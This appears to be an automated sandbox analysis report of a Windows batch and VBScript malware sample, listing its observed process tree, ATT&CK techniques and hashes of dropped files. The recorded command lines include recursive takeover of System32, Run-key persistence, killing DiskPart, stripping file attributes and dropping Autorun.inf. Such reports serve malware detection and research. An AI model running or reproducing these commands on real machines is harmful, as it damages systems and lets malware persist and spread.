C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9304

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:540

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:9640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10376

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10700

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10852

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11084

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1296

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9232

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:8968

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:10884

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:11472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:11840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
6⤵
PID:12248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
6⤵
PID:12256

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
6⤵
PID:12148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
6⤵
PID:11488

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
7⤵
- Modifies file permissions
PID:13120

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
6⤵
PID:2044

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
6⤵
PID:6152

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11956

C:\Windows\system32\calc.exe
calc
5⤵
PID:10656

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:10496

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:7676

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:4296

C:\Windows\system32\calc.exe
calc
5⤵
PID:7056

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:6400

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:6536

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:8956

C:\Windows\system32\calc.exe
calc
5⤵
PID:12816

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:13084

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12092

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:5244

C:\Windows\system32\calc.exe
calc
4⤵
PID:7752

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:8176

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:7884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:9400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:9428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:9612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:9732

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:9828

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:10192

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8272

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9312

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:11256

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:8244

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:7304

C:\Windows\system32\calc.exe
calc
4⤵
PID:6212

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:1328

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:4616

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:2516

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:6164

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6504

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:7680

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:4896

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5668

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:2720

C:\Windows\system32\calc.exe
calc
3⤵
- Modifies registry class
PID:2900

C:\Windows\explorer.exe
explorer.exe
3⤵
- Modifies registry class
PID:2460

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5648

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5892

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:6032

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:6084

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:1928

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5032

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5424

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6540

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6740

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7128

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2516

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7412

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7756

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7528

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6620

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6556

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9656

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7676

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10396

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9320

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11592

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11216

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11340

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9060

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5504

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12828

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:13176

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4848

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8080

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempShingapi.sk.bat
Filesize
26KB

MD5
977b003963e42262994223bfb827d610

SHA1
c357ccea26f64da9ad5c3bf96b83e12ccaeb916e

SHA256
d7a449acbcb78e0fb137a868d2c8b4e86f32d643cde7e7f291f77e5480ae2bb8

SHA512
99e3dadeebc8c35c6a47a0c7de4e82dbd558f5c23df910ff6899537f3ae370c4c5ea125353cb22ae469a332dfec14577a06ae651309405ef2e69ea000ff18e6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
Filesize
17KB

MD5
591700c81fbd38cf8c83092030536c14

SHA1
a122ca4b91ec2275400e10f21093c43186391c97

SHA256
29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e

SHA512
ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
240B

MD5
482dcfe952218cf31ad2adddd8f6616b

SHA1
7a6bcfce28c76bc3319c871696531d21200f3bc0

SHA256
093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5

SHA512
440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
300B

MD5
88a2fcd93445c8b092324fe1236d31dc

SHA1
f63653fe34d54b7e42e29689a934ed097329128d

SHA256
0783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419

SHA512
3e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
308B

MD5
328269fd01950232034f7fc507b917ba

SHA1
44df4af7e86d3e252b6a454513a900e475d2db33

SHA256
9327383056d89574fbeb87d98987ce8ae0cb39e8e816b12a53e9df0ec49b113d

SHA512
77acf8e91e0dc78b74548956b8e4a3b3a5cf98bacecdbed7a764ee1932f7751c7b9d49b972388eb5b762fd08ae344bcf2d5beeb698626ab15594f3209d35a13f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
358B

MD5
3188f652d604c7a023c7691bd2bdc67c

SHA1
c5d6a84c50573b617a00a45fe24abb007de107cb

SHA256
37e07aef20c217138f7cc2aad6c747859b4a696097bab2dc7626e72be31dddeb

SHA512
9afcd2487795f18536c0fb334e8ad97f97c7168a5e6cc5e000b70840c59d24bfbd6563dedd155b0d991e50be43673933d932afbb5171fca6a288255127c841c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
408B

MD5
2349b9a6b4e3f61e53ec3a5346773122

SHA1
8703d518627eff57174654b7b201835749c806cd

SHA256
cc5a2cf7d4ea53b8c25089ed22b10dd30c8520c82e08dc5b051c1930ebcd5303

SHA512
748e25ed43114833ee79ef7cfe35dc0486d65b1e6256e9601f528de624f08d16e2ca2bec66c471c0517d34d1c9be241e50a2d3f6893f04d37d0e2fd0cd438f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
414B

MD5
8761f97b782a318e8fba7bc8018aa478

SHA1
95984e4969a9aa8862139900838fdaf232c46fa4

SHA256
47177adad71b234fdd77c0f2b5977d4766ccc59867d37e50188b02a66cadbc60

SHA512
d90862ea2d112ac605bd76823216f31daa8b60ff1d434fcbe9f04832e9d541760458e5ebbf7ce9561be42d18e0a11800b702adabfddf3bbaed08d867a5df88d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
60B

MD5
11aa52a7eca2cf8fdcd1584b5a8b6026

SHA1
01ae6066e6b3879cb0caf306cc91077b7c0bea1e

SHA256
8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11

SHA512
07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
180B

MD5
b2206e980c51067d6e9dd7575d842bdc

SHA1
5aa6f76eee9efd569089be7f363e30ebf0531a22

SHA256
add106f3d6e9cfd2fac3d14a74d6791a9caa257b9c7e105a9a5fc2a309337ecd

SHA512
89ab3ca635f8fdcb1206f0a1d585355a730506cc1d72ca666f1e9d650b24107368349b44ab0b3d3132442a2fc61c0c9404d00b717a61f305d9c93d5d638d9bec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
296B

MD5
b20421aba6b1738af56e402aed7b5fca

SHA1
7b9e8f147c25a383e775cf4ce66fec5f050f8187

SHA256
2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd

SHA512
32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
Filesize
222B

MD5
05a4d4594b598cfe885bf862787b8cde

SHA1
dfb26e156e88af25bd00db0bc788b81c521a4db9

SHA256
fd8427db8c0c5ad2c7a8fc36c18f9400e25bdd7dfd1d267ec11a7a94bdbd1cab

SHA512
ac1f87eabd69e1939f463c8710cdd1ba8a886ad6509d26d0fac4e09ab82056cf952b7a0cf2ecb55bb0549fdb0aff6457133eeb6b7b222df58f773f91df101136

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
216B

MD5
7659392a12010d8c761cb9888f6fd5ac

SHA1
b8829c26628740b77ab7405c231f420e860d8c1f

SHA256
71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431

SHA512
5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
270B

MD5
adad2cd23a8880d4b3bdb1481c5b7998

SHA1
823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c

SHA256
838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69

SHA512
8c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
278B

MD5
a8217e02508029f70e586635bc6db873

SHA1
ab19e9a21282b68f2c8c67953105ab95b05e6168

SHA256
9aea836aed56a879f2b62d11ca2d35f4a56620956d6bc9fa2bbf4aee24249787

SHA512
33074686fa13c9bf8225e5bdce20ade67a4d8170c1595fed599f6716415ffc42e6b7376eda032079c4a2048d5df78c1f2b19c5825889ce6589315e487b77880a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
366B

MD5
86d51d80346eb615bb2cbe122efdee39

SHA1
b7ffa25c9b3d68aae34fcee4e9d4ce759ee802a4

SHA256
5d15ea660c2f819ced1adff0796db1e7bfda6609d70f0dbae5c348d81c32964b

SHA512
a5d2194b6bc1d658b6a3cde2f2d51f7f7b32c736dfd52d0b7e3d9957fcb7342b0545dfe93e26bd77596edc40f27cc30cf5b1fa27c39c0e8477e453e47e9f7999

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
372B

MD5
2f07a0eeda90c8de4ddbc41b5720b684

SHA1
8e0d022b1f1592512cdbd79a07262326cd087d3f

SHA256
a0730b54654a17006141efa1bb1354d21ecaa56f50b119467e96f2939ac6eaad

SHA512
233361936774a28abd26f8e48de80934dbccd360c5874333006050b2f8aac5e4d94e9aae513e419b4ecf02a455e1640f306ea40dc7edd66ae8e502e96ab62d17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
378B

MD5
112c09605b53288ae37a7d6ceb8ec3c3

SHA1
368f0b84b8f7e5835ec1ff6cfccea63b37985348

SHA256
8b6068f92d60d8f594a3834b1fd68ccedafa8c6df2f4e0f43dcbc513561437e4

SHA512
e349a590db8474feeee721119f8ba698dabe51a16557b015cba57eff20dcb2b679bcba01fe42e75a936cbb3b5bc67af0d38176761715f2c8d83036d9f00c1430

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
382B

MD5
4d8b24ab53e9685096c46046ea3f20b1

SHA1
650e5d2e2a2f263657107385b5ef87f678f36510

SHA256
172d9d0ba529cee20b666f3b1a778801fcb24daf4c1f88e6b45312e5df16e0d6

SHA512
aa3290d3edbd16180643152d0bd6785177b372b4ba7e3ae9a1eb6fd91281ec5fec7caef839a2734430070e76629f7ce187a6f1f1921a21f01dca2583e89b535e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
426B

MD5
81a24f8120fa35b69363a40cf5ec5a33

SHA1
c27b56e4dea4dfbb9d72dff110213897c9dfb549

SHA256
d8c095c9c445be47143b9f5cfc5b1e83b74ef6bcfa40f03c015e49ea61e57fb4

SHA512
f001bda4be38166c62166b69fa4db1d47add0890a399b57e548e459782ec763f96e7a59c2bab810eb2cd6d085124e5f375d00206cf12e2eff2adafb8746eb54e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
54B

MD5
888e64c554686bbbc0499057cce1af36

SHA1
5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006

SHA256
616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d

SHA512
9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
Filesize
162B

MD5
d5980bf4b018e4c397df95afe8941c66

SHA1
ce53c669a898d09479831bc59bc31a5fba2a6f2b

SHA256
9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a

SHA512
c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
276B

MD5
089381a847f01ba0962ae00f0d92d5e8

SHA1
9f3240f89871639778a318e0cadccafcf9d7c55e

SHA256
2cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05

SHA512
89fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
345B

MD5
baa511e0932e6c0781dd1488615d17a6

SHA1
e3218aefe8c272ade02eb6cc5188df6d50b04de0

SHA256
20fa853d5be5b8f30eeb6ae3e24558a2091d80102944ab26b9861df5cea6c6fa

SHA512
24be7fabda63dd82dfb5307e2ae0dc7176bf59c0918f1316bddb7515e0695b10cd6e24420af4afcda3d5f1b01e3d540a2d75a629f40c381da05eb3c28ff4697e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
69B

MD5
72946942abf5cf295f726b816c531ebf

SHA1
8ac5ccae8003c3776c2e0ee0959a76c8bc913495

SHA256
d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25

SHA512
2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
1KB

MD5
637146c9cb84c3e925310c222aa66e6c

SHA1
cfe2e60346bfb08b9c93d3cc8511ec5a0f732846

SHA256
b266da1e37993f333dc287ceabb7bf0b61ad2750c1d0ad4e7fcb2be5597ca88c

SHA512
8e76d9cb7474912624d8d76ee6b72c33d57d776ebfba0ff27df08fe14c87322e272ea105bbcb3a3e1aef34d953ccc5b83603ec19c3d517caacc514ba78029329

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
Filesize
142B

MD5
09a66de624d647dadd33c7897344dc66

SHA1
0819f133c861cd4ca007de9abb9778a7e76cd24b

SHA256
a540e358c1349df49f88e0fd99bbc844430c84dc79d2599c878743f8f4b2ddb3

SHA512
1883d62b7fedff77e8893003719fd2e6b0a9d47963e2bfbc08e662e09145745e1f7d7a21fc47c4470e19dbef2ba274e1f87d0a6841bb804e2ed06205d5e1e779

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
692B

MD5
6989502044e4a9fca67e9ded25de9956

SHA1
9a8d099caad939d32599530b27f7db641cbdb8da

SHA256
b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c

SHA512
9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
1KB

MD5
0fdd76e3cf93e100def34ac33e62a516

SHA1
88195f2f8182b2e70baa3909f3cdd0b8b645ff1e

SHA256
739819fe4b44a84491146a20870aa3f4605cc7e386d4274beb5615b39d95baac

SHA512
66843347dc861cc7f27b86b5fd9a11abc427b583333562393674e83df04dd03d92d25c61ba7e8f5747867d57dd749bd0ae6f1a551a35b98c4a91be2039d33992

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
173B

MD5
0c998e3681eb9f67fbacda38281c5fa7

SHA1
bd3e89780f374c54c5dfbe3fab83a926ca5803de

SHA256
3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205

SHA512
11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
Filesize
1KB

MD5
a90843e895d5444355e06c5625dfb613

SHA1
73a92d3ea21c281e5b1ab7ef031aaa9ebe625a78

SHA256
1e9580a9b253391ef655633ca06449ec9e0751db1ae42300251d36d826f4109a

SHA512
ed92df803418702ffdbc3e9c5beb7874249d418802cd1e1dd9e56d521c3fe3cb055a55fa6d2095127f4e040df95997f64abe0ec2fbbf5f5b45a0054547e2a900

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
18KB

MD5
6b5c03df5b27f239ee047ba2a8274e9e

SHA1
55f477bb3d17e2d762823a550b24a09d7c01ff1c

SHA256
84dec6f5ed4c4099d5b95eb9586cee3307b127b502181451c3d4c5026c64b387

SHA512
3eefff6c34e557205ba7870db21a68805d08c76932b0c984fea8cada5e8add2ed85d470f3bea9e5780e23db60a08e0aa02330cea94e7816e9a2bcfa74843c3b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
4KB

MD5
95bd3350b35e064121e66185a3599c41

SHA1
0f9f2fc3c3cf67815d78fdda3b93f91fb4b664c5

SHA256
5adaced65862b3487049be38f0559705d90876f984c3909554c836c1eb5701da

SHA512
aaadf0a39da5f59a95a57ea9a05b46a499e6ee5ff1ab29967acf0be12a0a07a261577eac7cad678e92852b55220e89d42e265a4a586fa7096d69efb2ed1e91e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
6KB

MD5
5d33559fe6cd8ccd8884d2344f9557c8

SHA1
bc1a9ddd5fb50e28776f73323e5f4ccfe75cc882

SHA256
e0d17b0ceb42e31b5a47b7ff69ec953ca6fcf2343a5f647ebfbbab3e9da0ce3c

SHA512
7bc31a2ad1b7c345391748937b19dec273568e1305767a02ab5fe2ce5a075f8e75a95dccea6fdb0e2a4f6c31ce2764056bd40382af7914bc7959a43c70e3cefb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
6KB

MD5
1bee38c8b88aedbed8df64e80c8f585c

SHA1
630d125ce7ca252feccd6e3af0d8b926ea6f6cfa

SHA256
0c0509227a0e746fed705fdb2ab39fa02c76d1684a23d3311f9cfdf5a6211d9d

SHA512
aa1e8b8e6d92867c11e016d9ab32c581096985b1760432edf211ee161bf7287bfb1bcda6e3f3a041f0ef435fc22997cfaea357aa5d1e0fddf35364b1219c99f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
445B

MD5
401e4eb249071b70f56d18e942ae7df2

SHA1
f3820c8c3ecf2443504736023fc0ce252d06e19c

SHA256
33413957207bff35858e95b3d8a54bf2b9e7d20882a4a62366946cfd960dbe73

SHA512
